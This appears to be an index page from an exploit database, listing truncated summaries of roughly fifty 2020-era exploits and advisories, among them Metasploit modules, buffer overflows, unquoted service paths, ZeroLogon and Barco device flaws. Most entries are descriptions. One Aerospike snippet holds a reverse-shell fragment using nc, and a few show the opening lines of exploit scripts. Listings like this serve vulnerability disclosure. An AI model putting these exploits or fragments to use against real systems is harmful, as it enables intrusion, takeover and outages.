SciKit-Learn 0.23.2 Denial Of Service Vulnerability
SciKit-Learn 0.23.2 Denial Of Service Description svm_predict_values in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service segmentation fault via a crafted model SVM introduced via pickle, json, or any other model permanence...
Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path Vulnerability
Exploit Title: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path Discovery by: Jok3r Vendor Homepage: https://home.pearsonvue.com/ Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENUTCInstallGuide/DownloadVTSInstaller.htm Tested Version: 2.3.1911...
YATinyWinFTP - Denial of Service Exploit
Exploit Title: YATinyWinFTP - Denial of Service PoC Google Dork: None Exploit Author: strider Vendor Homepage: https://github.com/ik80/YATinyWinFTP Software Link: https://github.com/ik80/YATinyWinFTP Tested on: Windows 10 Description: ...
Apache NiFi API Remote Code Execution Exploit
This Metasploit module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must be unsecured or credentials provided and the ExecuteProcess processor must be available. An ExecuteProcessor processor is created then is configured with the payload and...
Foxit Reader 9.0.1.1049 - Arbitrary Code Execution Exploit
Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution Exploit Author: CrossWire Vendor Homepage: https://www.foxitsoftware.com/ Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&packagetype=exe&language=English...
libupnp 1.6.18 - Stack-based buffer overflow Exploit
Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow DoS Date: 2020-08-20 Exploit Author: Patrik Lantz Vendor Homepage: https://pupnp.sourceforge.io/ Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download Version: = 1.6.6 Tested on:...
SAP Lumira 1.31 - Stored Cross-Site Scripting Vulnerability
Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting Exploit Author: Ilca Lucian Florin Vendor Homepage: https://www.sap.com Software Link: SAP Lumira Version: 123 •...
Adobe Flash Player MediaPlayer Out-Of-Bounds Access Remote Code Execution Exploit
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of...
Pure-FTPd 1.0.48 - Remote Denial of Service Exploit
Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service Date: 2020. nov. 26., 09:32:17 CET Exploit Author: xynmaps Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/ Software Link: https://github.com/jedisct1/pure-ftpd/ Version: 1.0.48 Tested on: Parrot Security OS 5.9.0 encoding=utf...
Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution Exploit
Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution Exploit Author: Loke Hui Yi Vendor Homepage: https://razerid.razer.com Software Link: http://rzr.to/synapse-3-pc-download Version: , and create an exe file with the same application's name in that folder. The Ap...
Wondershare Driver Install Service help 10.7.1.321 - (ElevationService) Unquote Service Path Vulnera
Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path Exploit Author: Luis Sandoval Vendor Homepage: https://www.wondershare.com/ Software Link: https://www.wondershare.com/drfone/ Version: 10.7.1.321 Tested on: Windows 10 Home Single Language...
WordPress Simple File List Unauthenticated Remote Code Execution Exploit
This Metasploit module exploits WordPress Simple File List plugin versions prior to 4.2.3, which allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrar...
OpenMediaVault rpc.php Authenticated PHP Code Injection Exploit
This Metasploit module exploits an authenticated PHP code injection vulnerability found in openmediavault versions before 4.1.36 and 5.x versions before 5.5.12 inclusive in the "sortfield" POST parameter of the rpc.php page, because "json_encode_safe" is not used in config/databasebackend.inc...
Kong Gateway Admin API Remote Code Execution Exploit
This Metasploit module uses the Kong admin API to create a route and a serverless function plugin that is associated with the route. The plugin runs Lua code and is used to run a system command using os.execute. After execution the route is deleted, which also deletes the plugin...
docPrint Pro 8.0 - (Add URL) Buffer Overflow (SEH Egghunter) Exploit
Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow SEH Egghunter Exploit Author: MasterVlad Vendor Homepage: http://www.verypdf.com Software Link: http://dl.verypdf.net/docprintprosetup.exe Version: 8.0 Vulnerability Type: Local Buffer Overflow Tested on: Windows 7 32-bit Proof of Concep...
Apache OpenMeetings 5.0.0 - (hostname) Denial of Service Vulnerability
Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service Google Dork: "Apache OpenMeetings DOS" Exploit Author: SunCSR ThienNV - Sun Cyber Security Research Vendor Homepage: https://openmeetings.apache.org/ Software Link: https://openmeetings.apache.org/ Version: 4.0.0 - 5.0.0 Test...
ZeroShell 3.9.0 - (cgi-bin/kerbynet) Remote Root Command Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Zeroshell 3.9.0 Remote Command Execution', 'Description' = %q This module exploits an unauthenticated command injection vulnerability found in...
Barco wePresent WiPG-1600W Insecure Firmware Image Vulnerability
Barco wePresent WiPG-1600W versions 2.5.1.8, 2.5.0.25, 2.5.0.24, and 2.4.1.19 have firmware that does not perform verification of digitally signed firmware updates and is susceptible to processing and installing modified/malicious images. Title: Barco wePresent Insecure Firmware Image Publication...
Barco wePresent WiPG-1600W Admin Credential Exposure Vulnerability
An attacker armed with hardcoded API credentials from KL-001-2020-004 CVE-2020-28329 can issue an authenticated query to display the admin password for the main web user interface listening on port 443/tcp for Barco wePresent WiPG-1600W version 2.5.1.8. Title: Barco wePresent Admin Credentials...
Barco wePresent WiPG-1600W Hardcoded API Credentials Vulnerability
Barco wePresent device firmware includes a hardcoded API account and password that is discoverable by inspecting the firmware image. A malicious actor could use this password to access authenticated, administrative functions in the API. Versions affected include 2.5.1.8, 2.5.0.25, 2.5.0.24, and...
Barco wePresent WiPG-1600W Authentication Bypass Vulnerability
The Barco wePresent WiPG-1600W version 2.5.1.8 web interface does not use session cookies for tracking authenticated sessions. Instead, the web interface uses a "SEID" token that is appended to the end of URLs in GET requests. Thus the "SEID" would be exposed in web proxy logs and browser history...
Barco wePresent WiPG-1600W Global Hardcoded Root SSH Password Vulnerability
Barco wePresent WiPG-1600W versions 2.5.1.8, 2.5.0.25, 2.5.0.24, and 2.4.1.19 have a hardcoded root password hash included in the firmware image. Title: Barco wePresent Global Hardcoded Root SSH Password Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-008.txt 1...
Barco wePresent WiPG-1600W Undocumented SSH Interface Vulnerability
Barco wePresent WiPG-1600W version 2.5.1.8 has an SSH daemon included in the firmware image. By default, the SSH daemon is disabled and does not start at system boot. The system initialization scripts read a device configuration file variable to see if the SSH daemon should be started. The web...
Boxoft Audio Converter 2.3.0 - (.wav) Buffer Overflow (SEH) Exploit
Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow SEH Discovery by: Luis Martinez Vendor Homepage: http://www.boxoft.com/ Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe Tested Version: 2.3.0 Vulnerability Type: Local Buffer Overflow SEH Tested on OS: Windows...
Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution Exploit
This Metasploit module exploits a series of vulnerabilities to achieve unauthenticated remote code execution on the Rockwell FactoryTalk View SE SCADA product as the IIS user. The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project...
Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Free MP3 CD Ripper 2.6 %q This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8. By constructing a specially crafted...
Boxoft Convert Master 1.3.0 - (wav) SEH Local Exploit
Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit Vendor Homepage: http://www.boxoft.com/ Software Link: http://www.boxoft.com/convert-master/setupboxoft-conver=t-master.exe Exploit Author: Achilles Tested Version: 1.3.0 Tested on: Windows 7 x64 1.- Run python code...
Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH) Exploit
Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution SEH Exploit Author: Vincent Wolterman Vendor Homepage: https://www.zortam.com/index.html Software Link: https://www.zortam.com/download.html Version: 27.60 Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Profession...
IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - Buffer Overflow Exploit
Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow Exploit Author: Paolo Stagno aka VoidSec Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG77.1.0/com.ibm.itsm.tsm.doc/welcome.html Version: 5.2.0.1...
Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow Exploit
Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow PoC Exploit Author: Vincent Wolterman Vendor Homepage: http://www.internetdownloadmanager.com/ Software Link: http://www.internetdownloadmanager.com/download.html Version: 6.38.12 Tested on: Windows 7...
Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure Exploit
Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure Exploit Author: Nitesh Surana Vendor Homepage: https://www.gxgroup.eu/ont-products/ Version: P4410-V2-1.34H Tested on: Windows/Kali CVE : CVE-2020-25988 import upnpy upnp = upnpy.UPnP Discover UPnP devices on the network...
Oracle WebLogic Server Administration Console Handle Remote Code Execution Exploit
This Metasploit module exploits a path traversal and a Java class instantiation in the handle implementation of WebLogic's Administration Console to execute code as the WebLogic user. Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 are known to be affected. Tested against...
ZeroLogon - Netlogon Elevation of Privilege Exploit
Exploit Title: ZeroLogon - Netlogon Elevation of Privilege Date: 2020-10-04 Exploit Author: West Shepherd Vendor Homepage: https://www.microsoft.com Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 Tested on: Microsof...
Microsoft Internet Explorer 11 - Use-After-Free Exploit
Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free Exploit Author: maxpl0it Vendor Homepage: https://www.microsoft.com/ Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx Version: IE 8, 9, 10, and 11 Tested on: Windows 7 x64 CVE : CVE-2020-0674 //...
Apache Struts 2.5.20 - Double OGNL evaluation Exploit
Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation Exploit Author: West Shepherd Vendor Homepage: https://struts.apache.org/download.cgi Version: Struts 2.0.0 - Struts 2.5.20 S2-059 CVE : CVE-2019-0230 Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github...
LCD_Service 1.0.1.0 - (LCD_Service) Unquote Service Path Vulnerability
Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path Exploit Author: Gerardo González Vendor Homepage: https://consumer.huawei.com/mx Software Link: https://consumer.huawei.com/mx Version: 1.0.1.0 Tested on: Windows 10 Home Single Language x64 Esp Step to discover the...
Aerospike Database 5.1.0.3 - OS Command Execution Exploit
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect except Exception a...
Atheros Coex Service Application 8.0.0.255 - (ZAtheros Bt&Wlan Coex Agent) Unquoted Service Path
Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path Exploit Author : Isabel Lopez Vendor Homepage : https://www.file.net/process/athcoexagent.exe.html Link Software : https://www.boostbyreason.com/resource-file-9102-athcoexagent-exe.aspx...
Advanced System Care Service 13 - (AdvancedSystemCareService13) Unquoted Service Path Vulnerability
Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path Author: Jair Amezcua Vendor Homepage: https://www.iobit.com Software Link: https://www.iobit.com/es/advancedsystemcarepro.php Version : 13.0.0.157 Tested on: Windows 10 64bitEN CVE : N/A 1. Description:...
AIX 5.3L /usr/sbin/lquerypv Local Root Privilege Escalation Exploit
AIX 5.3L /usr/sbin/lquerypv local root privilege escalation. AIX5.3L includes a setuid root binary "lquerypv" which contains a stack-based overflow in the handling of -V command line argument. However, prior to the vulnerability being...
Cisco 7937G - DoS/Privilege Escalation Exploit
Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation Exploit Author: Cody Martin Vendor Homepage: https://cisco.com Version: =SIP-1-4-5-7 Tested On: SIP-1-4-5-5, SIP-1-4-5-7 !/usr/bin/python import sys import getopt import requests import paramiko import socket import os def mainargv:...
KiteService 1.2020.1113.1 - (KiteService.exe) Unquoted Service Path Vulnerability
Exploit Title: KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path Discovery by: IRVIN GIL Vendor Homepage: https://www.kite.com/ Tested Version: 1.2020.1113.1 Vulnerability Type: Unquoted Service Path Tested on OS: Windows 10 x64 es Step to discover Unquoted Service Path: C:\wmic...
Logitech Solar Keyboard Service - (L4301_Solar) Unquoted Service Path Vulnerability
Title: Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path Author: Jair Amezcua Vendor Homepage: https://www.logitech.com/es-mx Software Link: https://support.logi.com/hc/en-us/articles/360024692874--Downloads-Wireless-Solar-Keyboard-K750 Version : 1.10.3.0 Tested on: Windows 10...
ASUS TM-AC1900 Arbitrary Command Execution Exploit
This Metasploit module exploits a code execution vulnerability within the ASUS TM-AC1900 router as an authenticated user. The vulnerability is due to a failure to filter out percent-encoded newline characters within the HTTP argument SystemCmd when invoking /apply.cgi which bypasses the patch for...
Bludit Panel Brute Forcer Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Bludit Panel Brute force', 'Description' = %q This Module performs brute force attack on Bludit Panel. , 'Author' = 'Eren Simsek ', 'License' =...
HorizontCMS 1.0.0-beta Shell Upload Exploit
This Metasploit module exploits an arbitrary file upload vulnerability in HorizontCMS 1.0.0-beta in order to execute arbitrary commands. The module first attempts to authenticate to HorizontCMS. It then tries to upload a malicious PHP file via an HTTP POST request to /admin/file-manager/fileuploa...
Citrix ADC NetScaler Local File Inclusion Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Citrix ADC NetScaler - Local File Inclusion Metasploit', 'Description' = % The remote device is affected by multiple vulnerabilities. An...
ReadyTalk Avian JVM FileOutputStream.write() Integer Overflow Exploit
ReadyTalk Avian JVM versions 1.2.0 before 27th October 2020 suffer from a FileOutputStream.write integer overflow vulnerability. Vulnerability title: Avian JVM FileOutputStream.write Integer Overflow Author: Pietro Oliva Vendor: ReadyTalk Product: Avian JVM Affected version: 1.2.0 before 27th...
DigitalPersona 5.1.0.656 (DpHostW) - Unquoted Service Path Vulnerability
Exploit Title: DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path Discovery by: Teresa Q Vendor: DigitalPersona U. are U. One Touch Version: 5.1.0.656 Vulnerability Type: Unquoted Service Path Vendor Homepage: https://www.hidglobal.com/crossmatch Tested on OS: Windows 10 Home x64 es Analy...
IDT PC Audio 1.0.6425.0 - (STacSV) Unquoted Service Path Vulnerability
Exploit Title: IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path Discovery by: Isabel Lopez Software link: https://www.pconlife.com/download/otherfile/20566/098185e9b7c417cf7480bb9f839db652/ Discovery Date: 2020-11-07 Tested Version: 1.0.6425.0 Vulnerability Type: Unquoted Service Path...